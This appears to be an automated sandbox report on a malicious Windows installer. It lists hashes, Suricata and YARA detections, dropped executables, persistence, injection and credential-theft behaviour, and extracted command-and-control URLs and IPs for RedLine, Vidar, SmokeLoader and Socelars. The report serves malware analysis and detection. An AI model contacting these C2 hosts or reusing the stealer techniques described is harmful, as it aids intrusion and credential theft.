Resubmissions
28-03-2022 07:58
220328-jty77adcdp 1025-03-2022 09:29
220325-lf232adhh3 125-03-2022 09:16
220325-k8tfxsaddl 1024-03-2022 20:10
220324-yx6trsdgg5 121-03-2022 09:00
220321-kyfgbaafh9 1021-03-2022 08:57
220321-kw1dpsafg5 420-03-2022 10:09
220320-l64pjscaen 1019-03-2022 11:38
220319-nr4gcaghhr 10Analysis
-
max time kernel
821s -
max time network
1191s -
platform
windows10_x64 -
resource
win10-20220310-en -
submitted
20-03-2022 10:09
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win10-20220310-en
General
-
Target
setup_x86_x64_install.exe
-
Size
6.2MB
-
MD5
d2f0cfac1c354f041c7b243f3df94d0a
-
SHA1
dfc03d06e799018485dc2dd72f997a0fef3d83a1
-
SHA256
3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c
-
SHA512
ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
redline
ANI
45.142.215.47:27643
Extracted
vidar
40.6
706
https://dimonbk83.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
bomji1234
86.107.197.196:63065
-
auth_value
c1142ca8af2e545509032e96c9bc48d7
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/5000-204-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2532-332-0x0000000000260000-0x0000000000280000-memory.dmp family_redline behavioral1/memory/5088-333-0x00000000008C0000-0x0000000000C88000-memory.dmp family_redline behavioral1/memory/5088-336-0x00000000008C0000-0x0000000000C88000-memory.dmp family_redline behavioral1/memory/5088-341-0x00000000008C0000-0x0000000000C88000-memory.dmp family_redline behavioral1/memory/5088-347-0x00000000008C0000-0x0000000000C88000-memory.dmp family_redline behavioral1/memory/5088-349-0x00000000008C0000-0x0000000000C88000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02dc626f48.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02dc626f48.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
SystemSettings.exedescription pid process target process PID 4348 created 2000 4348 SystemSettings.exe Explorer.EXE PID 4348 created 2000 4348 SystemSettings.exe Explorer.EXE PID 4348 created 2000 4348 SystemSettings.exe Explorer.EXE PID 4348 created 2000 4348 SystemSettings.exe Explorer.EXE -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1488-224-0x0000000004660000-0x00000000046A8000-memory.dmp family_onlylogger behavioral1/memory/1488-227-0x0000000000400000-0x0000000002B6B000-memory.dmp family_onlylogger -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1720-212-0x0000000003480000-0x0000000003554000-memory.dmp family_vidar behavioral1/memory/1720-217-0x0000000000400000-0x00000000017ED000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8B52472E\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8B52472E\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8B52472E\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.EXErundll32.exeflow pid process 233 2532 rundll32.EXE 234 4500 rundll32.exe 311 4500 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 52 IoCs
Processes:
setup_installer.exesetup_install.exeTue02522f9ea0b1.exeTue02520f255d0ba43a.exeTue029560e6534e190c.exeTue02976fcdf1.exeTue026e94a5005f8.exeTue028a363eda.exeTue026e182673.exeTue02dc626f48.exeTue0289c99651.exeTue02b2110095fe706.exeTue02705f9c2b455.exeTue02b2110095fe706.tmpTue026e94a5005f8.exeTue026e94a5005f8.exeTue026e94a5005f8.exet_UEXELzGE7DbXhkp8qBnR5m.exeJSthivfecrVkij8le8iLb8Jj.exeteDWWAvXpTgtaccLQ7oDU6_x.exeb1cDQg13UfnHvP3tcBRz5px4.exe6Z8jGP9JdcNM41nkfPAclin_.exeVnhWpFrjndsEQSHw1Fiiuf_K.exelQk6PJJ6IdIOShPMwmGSQdRe.exeS4ax8IMw6V0VoIGOVarOFSo6.exeDLJxTyWdA96FYpKDUbbRfhM6.exenJ_ERnYUI2Uvt80SCgTC9FDe.exeoi_Ha1TSBtEp0LheSeHKliDI.exeHRkfNmSVyuwfj3qC_X5aJD9W.exeQvXnoSGSfnW5mN4JVw_1TpjD.exeInstall.exe_VvUFRCH9UisvltNwRoKUsNE.exeInstall.exeSta.exe.pifrundll32.exereg.exeRkeagtomax1.exeMoUSO.exeAkdHuPQ.exeC794.exeMoUSO.exeC794.exeMoUSO.exeMoUSO.exeMoUSO.exeMoUSO.exetcsjwaacrsjwaadismhost.exeMoUSO.exeMoUSO.exeMoUSO.exepid process 1464 setup_installer.exe 1876 setup_install.exe 1896 Tue02522f9ea0b1.exe 2036 Tue02520f255d0ba43a.exe 1720 Tue029560e6534e190c.exe 1716 Tue02976fcdf1.exe 3884 Tue026e94a5005f8.exe 1784 Tue028a363eda.exe 1488 Tue026e182673.exe 1972 Tue02dc626f48.exe 4004 Tue0289c99651.exe 2424 Tue02b2110095fe706.exe 1320 Tue02705f9c2b455.exe 4112 Tue02b2110095fe706.tmp 4836 Tue026e94a5005f8.exe 4920 Tue026e94a5005f8.exe 5000 Tue026e94a5005f8.exe 4412 t_UEXELzGE7DbXhkp8qBnR5m.exe 4864 JSthivfecrVkij8le8iLb8Jj.exe 4912 teDWWAvXpTgtaccLQ7oDU6_x.exe 4836 b1cDQg13UfnHvP3tcBRz5px4.exe 4948 6Z8jGP9JdcNM41nkfPAclin_.exe 4896 VnhWpFrjndsEQSHw1Fiiuf_K.exe 1020 lQk6PJJ6IdIOShPMwmGSQdRe.exe 3828 S4ax8IMw6V0VoIGOVarOFSo6.exe 2832 DLJxTyWdA96FYpKDUbbRfhM6.exe 5088 nJ_ERnYUI2Uvt80SCgTC9FDe.exe 5076 oi_Ha1TSBtEp0LheSeHKliDI.exe 2532 HRkfNmSVyuwfj3qC_X5aJD9W.exe 2564 QvXnoSGSfnW5mN4JVw_1TpjD.exe 752 Install.exe 312 _VvUFRCH9UisvltNwRoKUsNE.exe 4608 Install.exe 4484 Sta.exe.pif 4500 rundll32.exe 4780 reg.exe 4136 Rkeagtomax1.exe 1896 MoUSO.exe 2436 AkdHuPQ.exe 4276 C794.exe 3964 MoUSO.exe 4144 C794.exe 5052 MoUSO.exe 4776 MoUSO.exe 4368 MoUSO.exe 2568 MoUSO.exe 1492 tcsjwaa 4532 crsjwaa 3692 dismhost.exe 1220 MoUSO.exe 3576 MoUSO.exe 4224 MoUSO.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue0289c99651.exe vmprotect C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue0289c99651.exe vmprotect behavioral1/memory/4004-173-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AkdHuPQ.exeTue02520f255d0ba43a.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Control Panel\International\Geo\Nation AkdHuPQ.exe Key value queried \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Control Panel\International\Geo\Nation Tue02520f255d0ba43a.exe -
Loads dropped DLL 19 IoCs
Processes:
setup_install.exeTue02b2110095fe706.tmptaskmgr.exeS4ax8IMw6V0VoIGOVarOFSo6.exerundll32.exedismhost.exepid process 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 1876 setup_install.exe 4112 Tue02b2110095fe706.tmp 2380 taskmgr.exe 3828 S4ax8IMw6V0VoIGOVarOFSo6.exe 3828 S4ax8IMw6V0VoIGOVarOFSo6.exe 4500 rundll32.exe 3692 dismhost.exe 3692 dismhost.exe 3692 dismhost.exe 3692 dismhost.exe 3692 dismhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
QvXnoSGSfnW5mN4JVw_1TpjD.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-370654639-3807403165-1443644579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Xeceh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Qanrdjgx\\Xeceh.exe\"" QvXnoSGSfnW5mN4JVw_1TpjD.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
AkdHuPQ.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json AkdHuPQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json AkdHuPQ.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
AkdHuPQ.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini AkdHuPQ.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip-api.com 87 ipinfo.io 88 ipinfo.io 166 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 35 IoCs
Processes:
AkdHuPQ.exeInstall.exeexplorer.exerundll32.exepowershell.exereg.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_946D9864B4F1FD10771D10327B5724D7 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42F5672C93743CEB7A490AEA00E50796 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AkdHuPQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AkdHuPQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42F5672C93743CEB7A490AEA00E50796 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_86ADF94B709B143BD643BB1C6F47DD63 AkdHuPQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log explorer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_9D8EAD474C2F772AA0EF6DA160946E46 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_946D9864B4F1FD10771D10327B5724D7 AkdHuPQ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AkdHuPQ.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_9D8EAD474C2F772AA0EF6DA160946E46 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_86ADF94B709B143BD643BB1C6F47DD63 AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData AkdHuPQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 AkdHuPQ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
nJ_ERnYUI2Uvt80SCgTC9FDe.exepid process 5088 nJ_ERnYUI2Uvt80SCgTC9FDe.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
Tue026e94a5005f8.exeQvXnoSGSfnW5mN4JVw_1TpjD.exeC794.exeC794.exedescription pid process target process PID 3884 set thread context of 5000 3884 Tue026e94a5005f8.exe Tue026e94a5005f8.exe PID 2564 set thread context of 3264 2564 QvXnoSGSfnW5mN4JVw_1TpjD.exe MSBuild.exe PID 4276 set thread context of 4144 4276 C794.exe C794.exe PID 4144 set thread context of 3712 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 1784 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 1248 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 3272 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 4632 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 380 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 4952 4144 C794.exe AddInProcess.exe PID 4144 set thread context of 3236 4144 C794.exe AddInProcess.exe -
Drops file in Program Files directory 16 IoCs
Processes:
b1cDQg13UfnHvP3tcBRz5px4.exeAkdHuPQ.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe b1cDQg13UfnHvP3tcBRz5px4.exe File created C:\Program Files (x86)\CgqbhrirU\AWlEAQ.dll AkdHuPQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AkdHuPQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AkdHuPQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja AkdHuPQ.exe File created C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\voyJiVr.xml AkdHuPQ.exe File created C:\Program Files (x86)\qSPWXtASFZsjC\RvAJpHr.dll AkdHuPQ.exe File created C:\Program Files (x86)\qSPWXtASFZsjC\fGiGFxP.xml AkdHuPQ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe b1cDQg13UfnHvP3tcBRz5px4.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AkdHuPQ.exe File created C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\nuEGDMP.dll AkdHuPQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AkdHuPQ.exe File created C:\Program Files (x86)\CgqbhrirU\AFgKmwO.xml AkdHuPQ.exe File created C:\Program Files (x86)\LHKJFdwYUyvU2\HADWalTEMANQB.dll AkdHuPQ.exe File created C:\Program Files (x86)\LHKJFdwYUyvU2\DeWwRiu.xml AkdHuPQ.exe File created C:\Program Files (x86)\LBHdSxvSsGUn\StaWDpO.dll AkdHuPQ.exe -
Drops file in Windows directory 64 IoCs
Processes:
systemreset.exeschtasks.exeSystemSettings.exeschtasks.exeWerFault.execrsjwaaSystemSettings.exetaskmgr.exeSystemSettings.exetaskmgr.exeschtasks.exeExplorer.EXEdescription ioc process File opened for modification C:\Windows\Logs\PBR\Panther\DDACLSys.log systemreset.exe File created C:\Windows\Logs\PBR\Panther\setupinfo systemreset.exe File created C:\Windows\Logs\PBR\Panther\unattend.xml systemreset.exe File created C:\Windows\Tasks\FNmmdByUIWCoGhfBf.job schtasks.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri SystemSettings.exe File created C:\Windows\Logs\PBR\INF\setupapi.offline.20170318_140323.log systemreset.exe File created C:\Windows\Logs\PBR\DISM\dism.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\actionqueue\specialize.uaq systemreset.exe File created C:\Windows\Logs\PBR\ReAgent\ReAgent.xml systemreset.exe File created C:\Windows\Logs\PBR\SessionID.xml systemreset.exe File opened for modification C:\Windows\Logs\PBR\setupact.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\setuperr.log systemreset.exe File created C:\Windows\Tasks\NYfziUdouSArZkj.job schtasks.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri WerFault.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri SystemSettings.exe File created C:\Windows\Logs\PBR\Panther\diagerr.xml systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\MainQueueOnline1.que systemreset.exe File created C:\Windows\Logs\PBR\Panther\actionqueue\specialize.uaq systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\actionqueue systemreset.exe File created C:\Windows\Logs\PBR\Panther\cbs.log systemreset.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri crsjwaa File created C:\Windows\Logs\PBR\INF\setupapi.dev.log systemreset.exe File created C:\Windows\Logs\PBR\INF\setupapi.setup.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\CBS systemreset.exe File opened for modification C:\Windows\Logs\PBR\DISM systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\cbs_unattend.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\_s_5BCF.tmp systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther systemreset.exe File created C:\Windows\rescache\_merged\1742034116\2462578334.pri SystemSettings.exe File created C:\Windows\Logs\PBR\Panther\setuperr.log systemreset.exe File created C:\Windows\Logs\PBR\Panther\_s_599B.tmp systemreset.exe File created C:\Windows\Logs\PBR\Timestamp.xml systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\cbs.log systemreset.exe File created C:\Windows\Logs\PBR\Panther\Contents1.dir systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\Contents1.dir systemreset.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri SystemSettings.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri SystemSettings.exe File created C:\Windows\Logs\PBR\Panther\actionqueue\oobeSystem.uaq systemreset.exe File created C:\Windows\Logs\PBR\Panther\UnattendGC\setupact.log systemreset.exe File created C:\Windows\Logs\PBR\Panther\setupact.log systemreset.exe File created C:\Windows\Logs\PBR\setuperr.log systemreset.exe File created C:\Windows\Logs\PBR\Panther\MainQueueOnline1.que systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\setuperr.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\PushButtonReset.etl systemreset.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri SystemSettings.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml systemreset.exe File opened for modification C:\Windows\Logs\PBR\INF\setupapi.setup.log systemreset.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File opened for modification C:\Windows\Logs\PBR\Panther\UnattendGC\setupact.log systemreset.exe File opened for modification C:\Windows\Logs\PBR\Timestamp.xml systemreset.exe File opened for modification C:\Windows\Logs\PBR systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\actionqueue\oobeSystem.uaq systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\diagwrn.xml systemreset.exe File created C:\Windows\Logs\PBR\Panther\MainQueueOnline0.que systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\setupinfo systemreset.exe File opened for modification C:\Windows\Logs\PBR\Panther\_s_5758.tmp systemreset.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\Tasks\bnHoQpKIlSSCUFQrDN.job schtasks.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri crsjwaa File opened for modification C:\Windows\Logs\PBR\Panther\MainQueueOnline0.que systemreset.exe File created C:\Windows\Logs\PBR\setupact.log systemreset.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri Explorer.EXE File created C:\Windows\rescache\_merged\1742034116\2462578334.pri SystemSettings.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 46 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4132 1876 WerFault.exe setup_install.exe 4432 1720 WerFault.exe Tue029560e6534e190c.exe 4564 1488 WerFault.exe Tue026e182673.exe 4608 1488 WerFault.exe Tue026e182673.exe 4636 1488 WerFault.exe Tue026e182673.exe 4664 1488 WerFault.exe Tue026e182673.exe 4720 1488 WerFault.exe Tue026e182673.exe 4864 1488 WerFault.exe Tue026e182673.exe 4896 1488 WerFault.exe Tue026e182673.exe 4940 1488 WerFault.exe Tue026e182673.exe 4968 1488 WerFault.exe Tue026e182673.exe 3832 4948 WerFault.exe 6Z8jGP9JdcNM41nkfPAclin_.exe 4132 1020 WerFault.exe lQk6PJJ6IdIOShPMwmGSQdRe.exe 4376 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 2668 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4960 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4852 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 5016 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4164 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4564 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4356 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 3728 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4900 4896 WerFault.exe VnhWpFrjndsEQSHw1Fiiuf_K.exe 4352 1488 WerFault.exe Tue026e182673.exe 4264 4948 WerFault.exe 6Z8jGP9JdcNM41nkfPAclin_.exe 3692 1020 WerFault.exe 